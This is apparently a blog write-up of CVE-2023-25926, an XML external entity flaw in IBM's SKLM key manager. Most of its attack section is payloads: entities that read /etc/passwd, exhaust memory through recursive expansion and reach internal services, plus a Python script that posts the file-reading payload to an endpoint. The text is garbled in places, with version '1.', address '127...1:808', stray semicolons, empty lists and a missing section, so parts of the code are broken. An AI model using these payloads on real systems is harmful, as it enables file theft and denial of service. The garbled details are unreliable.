CVE-2023-25926 - Exploiting an XXE Flaw in IBM Security Guardium Key Lifecycle Manager (SKLM)

IBM Security Guardium Key Lifecycle Manager (SKLM) is a widely-used solution for enterprise key management, providing secure key generation, storage, and distribution for data-at-rest encryption. However, a recently discovered vulnerability, CVE-2023-25926, exposes critical weaknesses in how SKLM handles XML inputs. This flaw can lead to an XML External Entity (XXE) Injection attack, enabling attackers to read sensitive files or cause a denial of service, impacting organizations that rely on SKLM for their encryption needs.

This long read explains the vulnerability in simple terms, shows real exploit examples, and provides practical clues to help you identify and mitigate the risk. All content is exclusive and written in plain, straightforward language.

4.1.1

IBM X-Force ID: 247599
See Security Bulletin: IBM Security Bulletin: CVE-2023-25926

What is XXE?

XML External Entity (XXE) Injection is a vulnerability that occurs when an XML parser blindly accepts and processes external entities provided in user-supplied XML. If not properly configured, the parser may allow attackers to:

Vulnerability Details

The problem with SKLM is its XML data processing. When external XML data is given for certain operations (for example, key management functions via its web service), SKLM does not properly restrict XML external entities. This allows a remote attacker to craft malicious XML to:

Crash or stress the server by allocating huge memory

IBM has fixed this problem in later releases, but many companies still use the affected versions.

Exploit Details (with Example)

To exploit this XXE, an attacker needs to send a specially crafted XML payload to a vulnerable SKLM endpoint listening for XML input.

1. Basic File Disclosure

Here’s how an attacker might read sensitive files like /etc/passwd (on Unix-like OS) by injecting an external entity into XML data.

Malicious XML Example

<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>
    &xxe;
</foo>

How it works:
- The <!ENTITY xxe SYSTEM "file:///etc/passwd" > line causes the XML parser to fetch the contents of /etc/passwd.
- When SKLM parses this, it will replace &xxe; with the actual content of the file and may include it in the system’s response or log.

Attackers can also exhaust memory resources with recursive entity expansion

<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

3. Network (SSRF, etc.)

If network access is possible, a similar payload can force SKLM to open connections to internal services, which may disclose further sensitive info or be abused for port scans.

<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://127...1:808/secret"; >
]>
<request>
  &xxe;
</request>

The following script demonstrates POSTing malicious XML to a theoretical SKLM endpoint

import requests

url = "https://sklm.example.com/api/xmlEndpoint";
headers = {"Content-Type": "application/xml"}

xml_payload = """<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>
    &xxe;
</foo>
"""

response = requests.post(url, data=xml_payload, headers=headers, verify=False)

print("Status:", response.status_code)
print("Response:", response.text)

*Warning:* Running this against a production SKLM instance without authorization is illegal and unethical.

Attackers and pentesters often look for admin and service endpoints, such as

- /api/*
- /ws/*
- /sklm/services/*

You can search for XML POST/PUT requests in documentation or through trial error (using tools like Burp Suite).

Watch for unusual content or failed XML parses.

Official Fixes and Updates:
- IBM Security Bulletin: CVE-2023-25926

References and Further Reading

- IBM Security Bulletin: XXE on SKLM (CVE-2023-25926)
- MITRE CVE Detail for CVE-2023-25926
- OWASP: XXE Explained_Processing)
- IBM X-Force Exchange: Report 247599

Conclusion

CVE-2023-25926 is a textbook XXE vulnerability, but in a critical encryption product like IBM SKLM, its impact is much greater. Attackers with even just network access can potentially read sensitive files or bring encryption infrastructure offline with a few lines of malicious XML. All affected users should patch immediately or apply workarounds. Understanding and hunting for these flaws is vital for all security teams.

Timeline

Published on: 02/29/2024 01:38:24 UTC
Last modified on: 02/29/2024 13:49:47 UTC